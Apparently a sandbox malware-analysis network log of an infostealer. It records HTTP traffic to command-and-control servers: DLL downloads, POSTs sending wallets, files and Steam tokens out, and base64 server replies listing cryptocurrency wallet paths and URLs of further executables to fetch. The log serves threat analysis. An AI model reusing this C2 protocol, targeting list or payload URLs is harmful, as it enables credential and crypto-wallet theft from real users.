48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 [TRUNCATED]
                                                                Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="file"------BGHJJDGHCBGDHIECBGID--
                                                                Jul 5, 2024 04:23:15.005637884 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:14 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=91
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:23:15.211714983 CEST90OUTGET /69934896f997d5bb/freebl3.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:23:15.393934011 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:15 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "a7550-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 685392
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                Jul 5, 2024 04:23:16.095067978 CEST90OUTGET /69934896f997d5bb/mozglue.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:23:16.274852991 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:16 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "94750-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 608080
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                Jul 5, 2024 04:23:16.680459976 CEST91OUTGET /69934896f997d5bb/msvcp140.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:23:16.868885040 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:16 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "6dde8-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 450024
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                Jul 5, 2024 04:23:17.192946911 CEST87OUTGET /69934896f997d5bb/nss3.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:23:17.371857882 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:17 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "1f3950-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 2046288
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                Jul 5, 2024 04:23:18.834132910 CEST91OUTGET /69934896f997d5bb/softokn3.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:23:19.018681049 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:18 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "3ef50-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 257872
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                Jul 5, 2024 04:23:19.224390984 CEST95OUTGET /69934896f997d5bb/vcruntime140.dll HTTP/1.1
                                                                Host: 85.28.47.30
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:23:19.404633999 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:19 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                ETag: "13bf0-5e7ebd4425100"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 80880
                                                                Content-Type: application/x-msdos-program
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                Jul 5, 2024 04:23:19.841190100 CEST199OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAEC
                                                                Host: 85.28.47.30
                                                                Content-Length: 1067
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jul 5, 2024 04:23:20.614025116 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:19 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=84
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:23:20.659255028 CEST465OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF
                                                                Host: 85.28.47.30
                                                                Content-Length: 267
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 2d 2d 0d 0a
                                                                Data Ascii: ------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="message"wallets------ECBGCGCGIEGCBFHIIEBF--
                                                                Jul 5, 2024 04:23:20.845496893 CEST1236INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:20 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 2408
                                                                Keep-Alive: timeout=5, max=83
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                Jul 5, 2024 04:23:20.847337961 CEST463OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAEC
                                                                Host: 85.28.47.30
                                                                Content-Length: 265
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 2d 2d 0d 0a
                                                                Data Ascii: ------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="message"files------KKJKEBKFCAAECAAAAAEC--
                                                                Jul 5, 2024 04:23:21.047276974 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:20 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=82
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:23:21.063704014 CEST561OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----IJEHIDHDAKJDHJKEBFIE
                                                                Host: 85.28.47.30
                                                                Content-Length: 363
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 49 44 48 44 41 4b 4a 44 48 4a 4b 45 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                Data Ascii: ------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJEHIDHDAKJDHJKEBFIEContent-Disposition: form-data; name="file"------IJEHIDHDAKJDHJKEBFIE--
                                                                Jul 5, 2024 04:23:21.633249044 CEST202INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:21 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 0
                                                                Keep-Alive: timeout=5, max=81
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Jul 5, 2024 04:23:21.656035900 CEST468OUTPOST /920475a59bac849d.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF
                                                                Host: 85.28.47.30
                                                                Content-Length: 270
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 31 39 63 63 64 35 65 34 32 64 38 65 33 37 33 35 39 33 63 33 65 34 31 62 31 64 38 38 36 37 63 61 35 63 35 30 61 33 64 30 31 66 66 39 38 64 37 34 33 66 37 34 62 37 64 65 33 65 31 66 39 61 62 31 33 64 35 32 63 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 2d 2d 0d 0a
                                                                Data Ascii: ------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="token"f819ccd5e42d8e373593c3e41b1d8867ca5c50a3d01ff98d743f74b7de3e1f9ab13d52ce------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="message"jbdtaijovg------ECBGCGCGIEGCBFHIIEBF--
                                                                Jul 5, 2024 04:23:22.340344906 CEST331INHTTP/1.1 200 OK
                                                                Date: Fri, 05 Jul 2024 02:23:21 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Vary: Accept-Encoding
                                                                Content-Length: 104
                                                                Keep-Alive: timeout=5, max=80
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 63 33 4c 6a 6b 78 4c 6a 63 33 4c 6a 67 78 4c 32 31 70 62 6d 55 76 59 57 31 68 5a 47 74 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 47 68 30 64 48 41 36 4c 79 38 33 4e 79 34 35 4d 53 34 33 4e 79 34 34 4d 53 39 6a 62 33 4e 30 4c 32 64 76 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 41 3d 3d
                                                                Data Ascii: aHR0cDovLzc3LjkxLjc3LjgxL21pbmUvYW1hZGthLmV4ZXwwfDB8fGh0dHA6Ly83Ny45MS43Ny44MS9jb3N0L2dvLmV4ZXwwfDB8fA==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.44973377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:08.103585958 CEST179OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 31
                                                                Cache-Control: no-cache
